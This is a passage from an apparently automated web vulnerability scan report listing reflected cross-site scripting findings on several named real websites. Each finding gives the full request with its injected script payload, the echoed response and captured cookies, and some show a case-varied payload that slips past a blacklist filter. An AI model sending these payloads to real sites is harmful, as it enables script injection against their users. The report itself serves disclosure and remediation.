Severity: High
Confidence: Certain
Host: http://bostonheraldnie.newspaperdirect.com
Path: /epaper/Services/HomePageHandler.ashx
Issue detail
The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39203%3balert(1)//7c31c657ad7 was submitted in the callback parameter. This input was echoed as 39203;alert(1)//7c31c657ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=imgsrvs&callback=HomePageManager._onImgSrvsDataLoaded39203%3balert(1)//7c31c657ad7 HTTP/1.1 Host: bostonheraldnie.newspaperdirect.com Proxy-Connection: keep-alive Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Expires: Sat, 24 Sep 2011 01:42:38 GMT Last-Modified: Sat, 17 Sep 2011 01:42:38 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 wc: 2 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:42:38 GMT Content-Length: 220
HomePageManager._onImgSrvsDataLoaded39203;alert(1)//7c31c657ad7(["http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx","http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx"])
4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bostonheraldnie.newspaperdirect.com
Path: /epaper/check.session
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5a4d3<script>alert(1)</script>798bcc7a568 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /epaper/check.session?callback=check_session_callback5a4d3<script>alert(1)</script>798bcc7a568&t=1316239605342 HTTP/1.1 Host: bostonheraldnie.newspaperdirect.com Proxy-Connection: keep-alive Referer: http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.9.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 wc: 4 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:45:23 GMT Content-Length: 88
check_session_callback5a4d3<script>alert(1)</script>798bcc7a568({interval:0,timeout:0});
4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c.brightcove.com
Path: /services/messagebroker/amf
Issue detail
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload e4004<script>alert(1)</script>f95237046cf was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9 HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 Content-Length: 554 Origin: http://bostonherald.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 content-type: application/x-amf Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1..... ...Qfa49d8dcd1acf958feddf0bf286c3afd013add68 cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de ...[SNIP]...
Response
HTTP/1.1 200 OK X-BC-Client-IP: 50.23.123.106 X-BC-Connecting-IP: 50.23.123.106 Content-Type: application/x-amf Vary: Accept-Encoding Date: Sat, 17 Sep 2011 01:33:17 GMT Server: Content-Length: 5105
......../1/onResult....... .C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi ...[SNIP]... 3.l.Y...eAQ~~,AAAAE6Rs9lk~,SN2uQ1cpwugime4djplD8tTayQcrFkg9. ..videoPlayer sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId type.mediaDTO .Bp.........ivideoPlayere4004<script>alert(1)</script>f95237046cf......... .cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription. ...[SNIP]...
4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cdnt.meteorsolutions.com
Path: /api/ie8_email
Issue detail
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ccca6<script>alert(1)</script>b631027d26d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1ccca6<script>alert(1)</script>b631027d26d&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B HTTP/1.1 Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
Response
HTTP/1.1 200 OK Content-Type: application/javascript Date: Sat, 17 Sep 2011 01:40:49 GMT Etag: "a4b5740c82ba57098d3f47fe0f640d85a84fd058" Server: nginx/0.7.65 Content-Length: 180 Connection: keep-alive
meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1ccca6<script>alert(1)</script>b631027d26d", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);
4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cdnt.meteorsolutions.com
Path: /api/ie8_email
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 16faf<script>alert(1)</script>25da9310260 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B16faf<script>alert(1)</script>25da9310260 HTTP/1.1 Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
Response
HTTP/1.1 200 OK Content-Type: application/javascript Date: Sat, 17 Sep 2011 01:41:29 GMT Etag: "2f474720da0453874e528615d87c85b45464f2e0" Server: nginx/0.7.65 Content-Length: 180 Connection: keep-alive
meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);16faf<script>alert(1)</script>25da9310260
4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cdnt.meteorsolutions.com
Path: /api/track
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B9af12<script>alert(1)</script>c3b46f05e43 HTTP/1.1 Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6
Response
HTTP/1.1 200 OK Content-Type: application/javascript Date: Sat, 17 Sep 2011 01:42:01 GMT Etag: "5c7333cf004a2bbfe1f6d26ba5911f5ba91d6b40" P3P: CP="NID DSP ALL COR" Server: nginx/0.7.65 Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/ Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6%00d77c2<a>11e0dd2ac6e; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/ Content-Length: 206 Connection: keep-alive
meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6\\x00d77c2\\x3Ca\\x3E11e0dd2ac6e"}, 0);9af12<script>alert(1)</script>c3b46f05e43
4.97. http://choices.truste.com/ca [c parameter]
Summary
Severity: High
Confidence: Certain
Host: http://choices.truste.com
Path: /ca
Issue detail
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont1291d0b<script>alert(1)</script>b9789a4c38&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
Response
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:33:33 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5737 Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={}; truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM ...[SNIP]... ntDivName:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-itl",iconSpanId:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont1291d0b<script>alert(1)</script>b9789a4c38",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_62adc6f1_e43b_47bc_8db1_bcd5cb5ff449_ib,interstitialWidth:728,interstitialHei ...[SNIP]...
4.98. http://choices.truste.com/ca [cid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://choices.truste.com
Path: /ca
Issue detail
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1 Host: choices.truste.com Proxy-Connection: keep-alive Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
Response
HTTP/1.1 200 OK Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/javascript Date: Sat, 17 Sep 2011 01:33:10 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache Server: Apache-Coyote/1.1 Vary: Accept-Encoding Content-Length: 5821 Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={}; truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM ...[SNIP]... <a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&w=728&h=90" target="_blank"> ...[SNIP]...
4.99. http://choices.truste.com/ca [iplc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://choices.truste.com
Path: /ca
Issue detail
The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:36:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={}; truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM ...[SNIP]... cdd_eaa0_4b10_9820_b0aa6f5cb790_bi={baseName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790",anchName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-anch",width:728,height:90,ox:0,oy:0,plc:"tr",iplc:"ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce",intDivName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-itl",iconSpanId:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02con ...[SNIP]...
4.100. http://choices.truste.com/ca [plc parameter]
Summary
Severity: High
Confidence: Certain
Host: http://choices.truste.com
Path: /ca
Issue detail
The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map
Response
HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive
if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={}; truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM ...[SNIP]... _clr1_651da5c8_906d_4ecd_9ea4_8e2426759de9_bi={baseName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9",anchName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-anch",width:728,height:90,ox:0,oy:0,plc:"tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829",iplc:"ctr",intDivName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-itl",iconSpanId:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI ...[SNIP]...
4.101. http://choices.truste.com/ca [zi parameter]
Summary
Severity: High
Confidence: Certain
Host: http://choices.truste.com
Path: /ca
Issue detail
The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
